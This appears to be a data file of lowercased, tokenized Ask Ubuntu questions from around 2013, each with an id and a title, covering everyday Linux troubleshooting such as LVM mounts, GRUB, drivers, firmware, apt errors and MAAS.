298081	unable to mount lvm partition	hi i am trying to mount a new logical volume . i am on ubuntu server 13.04 . i have created the lv using the rest of the disk space . i am receiving this error : ntfs signature is missing . failed to mount '/dev/mapper/theserver -- vg-lv_media ' : invalid argument the device '/dev/mapper/theserver -- vg-lv_media ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? im not sure why this is occuring . here is a list of my lvm setup : -- - logical volume -- - lv path /dev/theserver-vg/root lv name root vg name theserver-vg lv uuid ovifde-jtqa-lvlm-3qu2-mwz9-ktsw-ijlfdb lv write access read/write lv creation host , time theserver , 2013-05-08 19:26:34 -0600 lv status available # open 1 lv size 26.30 gib current le 6734 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv path /dev/theserver-vg/swap_1 lv name swap_1 vg name theserver-vg lv uuid bgmvac-q2xf-v814-tg7i-9mdp-xjv3-ci0rva lv write access read/write lv creation host , time theserver , 2013-05-08 19:26:35 -0600 lv status available # open 2 lv size 3.50 gib current le 895 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv path /dev/theserver-vg/lv_media lv name lv_media vg name theserver-vg lv uuid ok3auk-i1sl-dibf-syxv-gzfs-ufor-ocndda lv write access read/write lv creation host , time theserver , 2013-05-20 23:09:29 -0600 lv status available # open 0 lv size 901.47 gib current le 230776 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 i am mounting to /media/store could this be an issue because the mount point is on another lv in the same vg ?
298082	my fan is always on but not in mswindows ( hp elitebook 8460p )	problem : my laptop ( new ) fan is always on . question : what can i do to solve this issue ? situation : hp elitebook 8460p ubuntu 12.04 lts ( clean install , no mod , nothing ... really clean ... no dust ... not - even a little mod but the things i 've tried to solve this issue ) intel i5-2540m kernel : 3.5.0-30-generic # 51~precise1-ubuntu smp wed may 15 08:48:19 utc 2013 x86_64 x86_64 x86_64 gnu/linux 8gb ssd hd ati radeon 6470m 1gb ( proprietary drivers , latest but not beta as of 21/05/2013 ) low cpu speed ( current governor : ondemand [ same problem on all governor ] ) low gpu and cpu temp : around 50c low cpu load fan : faster when laptop is pluged to ac , slower on batteries but always on the fan behave like i think it should in win7 . what i did : search ... a lot ... then read ... a lot ... then search , then read , search , read , well i think you understand read about related and not so related issues on askubuntu . install cpufrequtil and set the thing properly set powersaver option in catalyst to save power ( i suppose it 's slow down everything ) disable vsync in catalyst ( why ? i do n't really know but as i told you : i 've read a lot about this issue so i 've tried stuff already ) disabled `` fan always on when on ac power '' in bios update bios to latest tried to control fan speed directly with think like fancontrol ... no luck tried to control ati fan with cli ... no luck ( since it 's a laptop , my fan is use for both cpu and gpu so i suppose it 's normal this doesnât work but why not try : d ) tried to disable acpi i probably tried other mysterious stuff but i do n't remember what . i search about intel_idle , setting cpu and gpu idle speed , many related subject . i heard about a possible kernel bug but havenât tried any fix since nothing seem related to my issue . i probably missed something somewhere then now i ask for help . big thanks !
298085	how to repair a failed program install on ubuntu ?	i had a program installing on ubuntu called 'ubuntu-restricted-extras ' and then my system shutdown because of powerfailure , i restarted and then tried the installation again and it comes up with a message saying `` previous installation has n't been completed . '' and then tells me that i have to repair this before i can install or remove any further software . what do i need to do to fix this ?
298088	how to populate configuration files over a lot of servers ?	i have configuration files at my home directory ( .bashrc , .gitignore , etc. ) . when i find something helpful for me i add this information into this files . but also i have access via ssh to different servers , where i 'm also using cli and need this changes . what i 'm doing now ? connecting via ssh and change everything manually . what i want to achieve ? i want to do it automatically . how i can make it ? what you can recommend for me ?
298094	how do i merge a number of documents into one pdf in the pdf printer	i have installed the pdf printer ( cups ) but have noticed that i am unable to print a number of documents through merging into one document . how can i do this ? i was able to merge documents in the pdf creator , while using windows .
298097	which iwlwifi firmware for intel wifi link 5100 ?	after upgrading to 13.04 the wifi usually fails to find a network and after a while the network manager crashes . after some digging it looks like the iwlwifi firmware version for my pc intel wifi link 5100 adapter is wrong . sudo lshw -class network shows that [ ... ] description : wireless interface product : wifi link 5100 vendor : intel corporation [ ... ] configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-21-generic firmware=8.83.5.1 build 33692 ip=192.168.0.109 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn but according to http : //wireless.kernel.org/en/users/drivers/iwlwifi the intel速 wireless wifi 5100agn driver should be iwlwifi-5000-ucode-5.4.a.11.tar.gz ( the firmware=8.83.5.1 above refers to an other wifi device namely to intel速 wireless wifi 5350agn ) . why does 13.04 use iwlwifi firmware=8.83.5.1 and not firmware=5.4.1.16 as suggested at http : //wireless.kernel.org/en/users/drivers/iwlwifi ? in order to correct the situation i downloaded the iwlwifi-5000-ucode-5.4.a.11.tar.gz which contains a file iwlwifi-5000-1.ucode . i also removed existing /lib/firmware/iwlwifi* files ( e.g . iwlwifi-5000-5.ucode ) and copied the new iwlwifi-5000-1.ucode in the firmware directory sudo mv /lib/firmware/*iwlwifi* ~/keep_iwlwif sudo cp iwlwifi-5000-1.ucode /lib/firmware after rebooting sudo lshw -class network displayed the firmware=5.4.1.16 which seemed good to me but the dmesg displayed following iwlwifi errors . [ 14.196502 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-5000-5.ucode ' failed . [ 14.200629 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-5000-4.ucode ' failed . [ 14.204814 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-5000-3.ucode ' failed . [ 14.253843 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-5000-2.ucode ' failed . i decided to add the iwlwifi-5000-5.ucode back to /lib/firmware and rebooted . after reboot i was back in where i started , sudo lshw -class network displayed again the firmware=8.83.5.1 and no dmesg errors for iwlwifi . moreover , the wifi did n't work any better .
298099	12.10 not booting from grub line but will boot to generic version	i am new to ubuntu and installed it as a method to access the internet while i attempted to repair my internet connection for windows xp sp3 . dual boot for both ubuntu and xp worked great . failing to find a solution for my xp 's loss of internet access i re-installed xp without researching how to preserve grub . needless to say i lost my access to ubuntu . using the instructions i could find i was able to regenerate the mulit-boot grub via the trial option on the install cd . now is where i am having trouble . i can access my xp multi-boot window from grub . i can access ubuntu if i access optional startup and select ubuntu with generic boot . if i select the ubuntu load from the main grub page my system just hangs . no errors , no colour screen , no splash screen just black . i have installed the latest version of grub customizer and when checking the script between the two load options the only difference is 2 echo lines . my eventual goal is to get grub operating properly so that i can select either my ubuntu 12.10 or my windows mulit-boot screen . from there i want to extract the ubuntu bootlogger file so that i can modify my windows multi-boot to allow me to add booting to ubuntu as an option . i have not made a final decision as to which option i will settle on but the exercise will be a great re-introduction to computer tuning . any and all suggestions will be greatly appreciated . if more information is needed i can provide copies of scripts and layouts .
298108	disk space lacking	my ubuntu partition was working on 50gb . however , even-though i had not used much of the memory , i was still getting messages saying the disk space is low . i increased the partition , but am still getting that error . i hardly have any bulky programs or anything like that installed . where did the disk space go ? can someone please have a look and tell me what is happening ? filesystem size used avail use % mounted on /dev/loop0 19g 17g 1.6g 92 % / udev 982m 4.0k 982m 1 % /dev tmpfs 396m 1.2m 395m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 990m 384k 989m 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/sda3 138g 25g 114g 18 % /host
298109	stuck in some kind of test pattern loop after installing nvidia drivers	i just installed the latest ubuntu and then enabled the restricted drivers for nvidia once i rebooted , the system starts but then enters some kind of graphical test pattern loop ( blue , black , white , grey , and finally all colours in horizontal bars ) at this point the system does not respond to any key combinations or mouse input . rebooting the system multiple times does not help either . update : just found this post : help ! 13.04 installation nvidia driver the difference being that i can not even get into a terminal with ctrl+alt+f1 update 2 : by booting in recovery mode in a root shell i was able to remove the driver and then follow the instructions from the other post . same coloured screens as a result .
298111	how to share internet over wifi ?	i m using ubuntu 12.04 i want to share my tata photon plus connection over wifi i used the procedure listed here but it does not connect to the wireless network in the host computer itself . please help thanks in advance
298118	will ubuntu work with my chipsets , video cards and processors ?	amd does not confirm that any of its products such as chipsets , video cards and processors will run linux and or ubuntu . i have multiple ( more than 10 ) motherboards with the 990fx chipset and have multiple fx processors and have multiple firepro and radeon cards . i have multiple sets of 4x4gb and 4x8gb of 1866 memory . i also have multiple ocz 's fastest ssd 's . contacting amd or their motherboard manufacturers results in declinations about linux or ubuntu support . i am tired of paying for windows repeatedly for each and every oem license . every time a hardware malfunctions and has to be replaced a new windows license has to be purchased . whether it is windows 7 pro or windows 8 pro licenses have to be purchased after every hardware change . if an attempt is made to reactivate windows it results in the destruction of the interface of the ocz ssd 's . i am seriously considering moving to the linux or ubuntu community . i am scared that all my hardware will not accept a linux or ubuntu installation . i am anxiously requesting help from ubuntu and the ubuntu community to make ubuntu work with the hardware that i already have . thanking you in anticipation of your kind and considerate help and support .
298120	mac osx , windows 7 and ubuntu	i want to install ubuntu 12.04 on a macbook pro with max osx und windows 7 ( bootcamp ) already installed . now there is a tutorial for installing ubuntu on recent mac osx editions . however it does not mention what to do if you already have windows 7 installed via bootcamp . there are old tutorials how to install ubuntu on mac with windows vista installed via bootcamp here and here . can i use the same procedure for a triple boot with windows 7 and refind instead of refit ? thank you for your assistance .
298124	remove completed downoads from rutorrent	i just setup rutorrent after being a long time rtorrent user . i want to remove the completed downloads . when i use a .torrent file i just have .rtorrnt.rc remove the file and rtorrent removes it from the list . now that i have rutrrent , i can use rss to download files . but there is no tied file . how do i remove completed downloads form rtorrent/rutorrent if they do n't have a tied file using a script ? i have tried a script the runs rtcontrol -- from-view started is_complete=yes -- delete -- yes but nothing seems to happen . edit : when i run it form su i get : root @ linux : /home/usr1 # ./bin/removecompleted.sh warning : pyrocore.util.load_config.configloader : configuration file '/root/.pyroscope/config.ini ' not found , use the command 'pyroadmin -- create-config ' to create it ! warning : pyrocore.util.load_config.configloader : configuration file '/root/.pyroscope/config.py ' not found ! error : pyrocore.scripts.rtcontrol.rtorrentcontrol : config file '/root/.rtorrent.rc ' does n't exist ! info : pyrocore.scripts.rtcontrol.rtorrentcontrol : total time : 0.035 seconds . .rtorrent.rc calls a python script that i wrote that calls removecompleted.sh with os.system ( `` /home/usr1/bin/removecompleted.sh > logfile.log '' ) . the log file comes back empty . if i call removecompleted.sh directly form .rtorrent.rc then rtorrent freezes and i need to reboot the pc . help ?
298131	hdd recovery tool	i accidentally unplugged one of my hdd 's from power while running . when i boot now , the name of the drive is display as : zzzzzz and some other funny characters . which is the best recovery tool for that on linux/ubuntu ? the hdd is ntfs formatted and has about 500gb . greetings , p .
298132	error while compiling a gtk application on ubuntu 13.04 - missing headers	i am developing a gtk application using the eclipse ide . i am unable to build the application cause when i include file from gtk/gtk-2.0/gtk.h then it gives me a error that `gdk/gdk.h` no such file or directory found .. i tried to add the include directory path also but it is of no use . is there is any way to solve this .
298138	which ubuntu for software development	please suggest me in this regard . i am having a lenono pc and dell inspiron n5010 ( both are 64 bit with 4gb of ram , intel i5 processors ) . my requirement is : '' a fully stable operating system ( ubuntu ) on which i can carry out qt application software development with readily available development tool chains ( gnu ) and preferably should support 64 bit application development '' . which one : ubuntu 13.04 desktop/ server ? 32 bit/ 64 bit ? thanks in advance . regards swamy .
298145	xserver-xorg-video-intel in ppa : ubuntu-x-swat/x-updates	i have two 12.04 , both update to 12.04.2 with kernel 3.2.0-43-generic . both are using ppa : ubuntu-x-swat/x-updates . i find i install xserver-xorg-video-intel 2.20 in one 12.04 , 2.19 in the other 12.04 . their systems are both updated . $ apt-cache policy xserver-xorg-video-intel xserver-xorg-video-intel : installed : 2:2.19.0-0ubuntu1~xup1 candidate : 2:2.19.0-0ubuntu1~xup1 version table : *** 2:2.19.0-0ubuntu1~xup1 0 500 http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 2:2.17.0-1ubuntu4.4 0 500 http : //mirrors.ustc.edu.cn/ubuntu/ precise-updates/main amd64 packages 2:2.17.0-1ubuntu4 0 500 http : //mirrors.ustc.edu.cn/ubuntu/ precise/main amd64 packages $ apt-cache policy xserver-xorg-video-intel xserver-xorg-video-intel : installed : 2:2.20.0-0ubuntu0~precise1 candidate : 2:2.20.0-0ubuntu0~precise1 version table : *** 2:2.20.0-0ubuntu0~precise1 0 100 /var/lib/dpkg/status 2:2.19.0-0ubuntu1~xup1 0 500 http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/ precise/main amd64 packages 2:2.17.0-1ubuntu4.4 0 500 http : //mirrors.ustc.edu.cn/ubuntu/ precise-updates/main amd64 packages 2:2.17.0-1ubuntu4 0 500 http : //mirrors.ustc.edu.cn/ubuntu/ precise/main amd64 packages why can not i install 2.20 version in the other 12.04 ? in that 12.04 's synaptics , i only find 2.19 version . why does that ppa offer differently in two systems ? thanks
298149	filter messages to `` notification area '' applet	i need to change the way the notification area applet ( not the indicator applet ! ) is displaying notifications . i like the old way where notifications were briefly shown on a black popup window ; i can only get that behavior if i remove the notification area from the panel . however , if i do so , my pidgin icon disappears also . on my panel , there are two icons served by the applet : pidgin icon and a mail icon with small black number showing how many notifications are there . i think it is extremely annoying to accumulate notifications such as `` user is offline '' or `` all downloads are completed '' because i have to constantly click on `` clear all notifications '' button . is there a way to filter the notifications or otherwise configure the widget ? is there a source code for it ? i could n't find it , there seems to be no process associated with the applet . thank you ! ps : i 'm running gnome-classic on 12.04
298150	how i can boot rt-lunix	under ubuntu 12.10 , i just load the linux-rt kernel the installation seems to be uneventful . only now , at the start , nothing new , it directly boot on my current system without offering me bios menu . if anyone can help me thank you
298153	amd/intel hybrid graphics driver on 3.6.6 kernel	i have an hp pavilion g6-2303sh d4y36ea notebook . i installed ubuntu 12.04 . i had to update the kernel to 3.6.6 because the default did n't support the ralink rt3290 wifi card . now i 'm trying to get the hybrid graphics working using this method : http : //ubuntuforums.org/showthread.php ? t=1930450 & page=80 when dpkg configures fglrx i get this error : loading new fglrx-8.961 dkms files ... building only for 3.6.6-030606-generic building for architecture x86_64 building initial module for 3.6.6-030606-generic error ( dkms apport ) : kernel package linux-headers-3.6.6-030606-generic is not supported error ! bad return status for module build on kernel : 3.6.6-030606-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.961/build/make.log for more information . /var/lib/dkms/fglrx/8.961/build/make.log contains this : dkms make.log for fglrx-8.961 for kernel 3.6.6-030606-generic ( x86_64 ) 2013. máj . 21. , kedd , 12.25.03 cest amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.6.6-030606-generic/build subdirs=/var/lib/dkms/fglrx/8.961/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.6.6-030606-generic' cc [ m ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kcl_mem_alloclinearaddrinterval’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:2122:5 : error : implicit declaration of function ‘do_mmap’ [ -werror=implicit-function-declaration ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:2122:13 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kasinitexecutionlevels’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : error : ‘cpu_possible_map’ undeclared ( first use in this function ) /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : note : each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : warning : left-hand operand of comma expression has no effect [ -wunused-value ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/8.961/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.6.6-030606-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 aticonfig says that it could not find a supported adapter . how can i solve this problem ?
298155	chrome ubuntu loading apache2 's localhost instead of remote website	i 'm a web developer and do local development through apache2 on localhost . however , sometimes when going to remote websites , well known websites like sky.com or bbc.com instead of loading that website chrome will attempt to load the page from localhost ( the browser will display whatever site i 'm developing locally ) . after hitting reload a few times or pressing enter a couple of times in the address bar it will sometimes decide to load the remote version , but not always . if the address is https then it always works ( but then i 'm not developing https sites locally either ) . in the address bar it still has the remote address , but the page displayed is from localhost , or a `` not found '' page .
298157	how to upgrade to the latest patch set in ubuntu 11.10	i have a ubuntu 11.10 machine and i want to upgrade the os to the latest set of patched in 11.10 and i do n't want a major version upgrade to 12.04 . how do i acheive this ?
298160	disable unity edge effects when running virtualbox in fullscreen	i 'm running windows 8 from a virtualbox machine inside ubuntu 13.04 , and i 'm having some problems navigating in the virtual machine . many of the navigation options in windows 8 ( the new start menu , for instance ) are accessible by moving the cursor to various corners and edges of the screen - this conflicts with my unity desktop , in which i 've mapped the corners to stuff as well using the ubunut tweak tool . is there any way to tell unity and/or virtualbox that when i run a virtual machine in full screen , i want these events forwarded to the guest os , and no action on the host ? this behavior applies also to the windows button ( between left alt and fn on my keyboard ) , which triggers the unity launcher instead of the start menu , even when in fullscreen .
298164	chrome seems to be making my ubuntu crash . how can i see what 's causing it ?	for the last 3-4 months i have been experiencing random system crashes : the screen just hangs and nothing can move . also i ca n't ssh into my box . on some days it does n't happen at all , and on others it can happen up to 3-4 times . sometimes it 'll hang , i 'll immediately restart my machine , and then it 'll crash again as soon as the desktop appears . i have a very strong feeling that it 's the google chrome browser that is somehow causing the crash , as chrome is usually running when it happens . is there anything i can do to try and diagnose what the issue might be ? i also get occasional ubuntu messages telling me that something has crashed in the background .
298167	maas - fatal error inserting ipmi_si	i 'm currently trying to install a node with maas ( virtualbox ) so after i 've setup the maas controller , i start a second virtual machine with pxe-boot . the installation process runs for some time and then always stops at the following error message fatal : error inserting ipmi_si ( lib/modules/3.2.0-31-generic/kernel/drivers/char/ipmi/ipmi_si.ko ) : no such device has anybody some advice as to how this can be fixed ? regards sandro
298174	how to add printer using samba in ubuntu 13.04 ?	the option is not present anymore in system settings printer to add : windows printer via samba
298176	how to update python from 2.7.3 to 2.7.4 on ubuntu 12.04 ?	i am running ubuntu 12.04 with python 2.7.3 installed . how can i update the version of python to 2.7.4 ? apt-get install python2.7 does not install anything new apt-get update python2.7 does not work as it does not accept arguments apt-get upgrade python2.7 installed version 2.7.3 , but not change to version 2.7.4 . so : how to install the version 2.7.4 of python on ubuntu 10.04 ?
298177	a `` failed to fetch '' error occurs when apt-get update is run . how do i fix this ?	contrary to the note above , i have n't found the answer to my problem . i have read almost a dozen apt-get update questions , most from askubuntu.com , with `` failed to fetch '' errors and tried the solutions answered there . unfortunately , none worked . i just recently installed ubuntu 12.04 on my laptop , dual booting it alongside windows 7 . when i tried sudo apt-get update on the terminal , the following kept occuring : err http : //ph.archive.ubuntu.com precise inrelease err http : //ph.archive.ubuntu.com precise-updates inrelease err http : //ph.archive.ubuntu.com precise-backports inrelease err http : //ph.archive.ubuntu.com precise release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err http : //ph.archive.ubuntu.com precise-updates release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err http : //ph.archive.ubuntu.com precise-backports release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err http : //extras.ubuntu.com precise inrelease err http : //extras.ubuntu.com precise release.gpg unable to connect to extras.ubuntu.com : http : err http : //security.ubuntu.com precise-security inrelease err http : //security.ubuntu.com precise-security release.gpg unable to connect to security.ubuntu.com : http : [ ip : 91.189.92.190 80 ] reading package lists ... done w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch http : //ph.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg unable to connect to ph.archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg unable to connect to security.ubuntu.com : http : [ ip : 91.189.92.190 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . note : this happened immediately after i installed ubuntu 12.04 . i am very new to the linux/ubuntu world and a noob when it comes to these kind of stuff . the sources list in the update manager ( and software center ) settings was short . it only contained 2 lines with `` canonical '' in it , 2 lines with `` independent '' in it , and 2 other lines . i think the list was short because it was a freshly installed ubuntu . connection to the internet seems fine and my friend whose laptop had just been installed with ubuntu 12.04 around the same time as mine , seems to have no problem with his update . we share the same connection so i think internet connection issues could n't have been the reason for the error . attempted solutions : from here , i explored around /etc/resolvconf/resolv.conf.d and added in the /etc/resolvconf/resolv.conf.d/head the following : nameserver 8.8.8.8 nameserver 8.8.4.4 error still occured . from here and here , i repeatedly changed which mirror server to use in the update manager and software sources settings . again , error still occured . i also tried editing my sources list , unchecking the lines with `` independent '' on it ( as suggested ) . according to here , i tried removing the derb-src lines in the sources list . still , to no avail . lastly , this site suggests running the following : echo `` nameserver 8.8.8.8 '' | sudo tee /etc/resolv.conf > /dev/null or , for a permanent solution , echo `` nameserver 8.8.8.8 '' | sudo tee /etc/resolvconf/resolv.conf.d/base > /dev/null sadly , nothing worked for me . in all forums that i have been to , the answer related to nameserver 8.8.8.8 seems to come up most often . take note also that i really did not understand the solutions , what they meant or how are they done . i just simply followed them . this is the output for cat /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main and the following is for cat /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search nip.upd.edu.ph it has been pointed out that the answer is here but unfortunately that did n't work either . i tried choosing different servers but the `` choose server '' was never available . searching for the best server yielded a `` no suitable server '' result . i think the mirror servers are fine and again , there seems to be no issue with internet connection . using ping -c3 archive.ubuntu.com and ping -c3 8.8.8.8 both yielded 0 % packet loss . the ping for 8.8.8.8 sometimes yielded 33 % packet loss but mostly 0 % . typing nslookup google.com yields server : 127.0.0.1 address : 127.0.0.1 # 53 output of ps aux | grep dns : nobody 1761 0.0 0.0 33012 1284 ? s 17:04 0:00 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var /run/sendsigs.omit.d/network-manager.dnsmasq.pid -- listen-address=127.0.0.1 -- conf- file=/var/run/nm-dns-dnsmasq.conf -- cache-size=0 -- proxy-dnssec joa 2197 0.0 0.0 13576 928 pts/0 s+ 17:10 0:00 grep -- color=auto dns
298179	disk drive / not ready yet or not available and no keyboard usb	it appears the window to upgrade from 12.10 to 13.04 and i click continue . it gave several errors and after reboot appears this : disk drive / not ready yet or not available but i can not press s neither m because my computer does not have a ps2 port for the keyboard . the keyboard is on the usb port but the ubuntu does not start the usb so the keyboard is dead . how to solve this problem ? thank you
298189	safe to install from daily build ppa ?	i have the dash blur bug which appears to be common to users of 13.04 with integrated intel graphics . https : //bugs.launchpad.net/nux/+bug/1087534 in that bug report people suggest upgrading libnux-4.0.0 from the daily build ppa . i tried this and it fixes the problem . is this a safe thing to do though or should i wait until the update is released to the main repository ? i 'm new to ubuntu so have no idea how long that takes .
298191	how do i inspect zeitgeist	on ubuntu 13.04 , is there a tool that allows me to inspect the contents of the zeitgeist logs ?
298194	can i upgrade to another desktop environment ?	i 'm currently running a vanilla ubuntu 12.04 lts that had unity replaced with with gnome-shell . what i 'd like to do is to do a do-release-upgrade that will install a specific flavor of ubuntu ( gnome in this case ) in 12.10 ? i 'd like to avoid doing upgrades that bring unity back in , forcing me to clear it out again .
298200	is there a command-line program that can output ascii art as an image ?	is there a command-line program that can convert an image to ascii art and then save that output as an image e.g . jpg or png ? to illustrate what i 'm in need of , i want to convert the image below into ascii art the output that i desire from a program should be similar to this one , which was created by taking a screenshot of the output of an image-to-ascii converter ( the output was pure text ) i 'm aware that gimp has the ability to save an image as ascii art and aview can also convert an image to ascii . however , the former can not be done via the command line and the latter only lets you view the output , not save it ( i do n't want to resort to taking a screenshot of the output ) . i 'm also aware that libcaca can save its output to an image , but it only outputs colourful ascii , like below . made by converting the source image to greyscale and then with the following command : img2txt -w 70 -f tga input.jpg > output.tga the reason for wanting a command-line program is to batch process a folder full of images .
298202	my login screen is stuck on screen even after i have logged in	i 'm new to ubuntu and i have just installed the latest version 13.04 . when i put in my password to log in , after i enter my password ubuntu seems to freeze but a few seconds later my cairo dock and unity desktop appears over the seemingly freezed ubuntu log in page . does anyone have any idea what 's going on ?
298204	13.04 does not recognise installation cd	i burned downloaded iso to a cd and installed ubuntu 13.04 from this disc . when updating software ( broadcom wifi ) the system asks me to load the `` raring ringtail cd '' - which i do , however ubuntu does not recognise the cd and the installation grinds to a halt . is there some way to make label/name the cd so that when ubuntu searches for it - it recognises the cd ?
298205	use swap for hibernating only	i have ubuntu 12.10 installed on an ssd with the swap partition on the same disk . now i want to use the swap partition only for hibernating ( not for swapping memory ) because the ssd do n't like the type of usage required for a memory . i can hibernate my computer , but after i restorer the system from hibernation it is using the swap partition for swapping memory . i want to disable this behavior and use the swap for hibernating only . is it possible somehow ?
298206	how do i password protect my webservers document root ?	i have installed lamp using tasksel and it is for a development system . i was wondering if i could password protect the folder /var/www/ and when someone goes to developmentservername.mydomain.com , i want it to ask for username and password . any ideas on how i could do this ? ubuntu 12.04.02 lts
298207	app like dos navigator for ubuntu ?	dos navigator was a very popular file manager for dos / old win . something like like norton commander , but waaay better in terms of feature support , and especially usability/ui . i was wondering if ubuntu has an app like this . i 'm aware of midnight commander , but it 's not really that good : (
298213	problem with node being `` commissioning '' and does n't change to `` ready ''	i got a machine up and running 13.04 . i followed the instruction and set up maas . current state i need nodes to be in `` ready '' state , so that i can install juju with maas . however , the nodes are stuck in `` commissioning '' state . i checked the clocks in each node , and they all synchronize well . i also tried `` $ maas-cli maas nodes accept-all '' for automatic discovery i am not sure how to fix this . thank you
298216	unable to send file via bluetooth to android phone	i am having typical problem..i am able to turn on the bluetooth on laptop and even pair with my android device..but when i send file from laptop to mobile it says `` not authorized '' error occured while transferring.. ( error code 0x41 ) ... i am not computer savvy and i am using ubuntu for the first time . thanx in advance
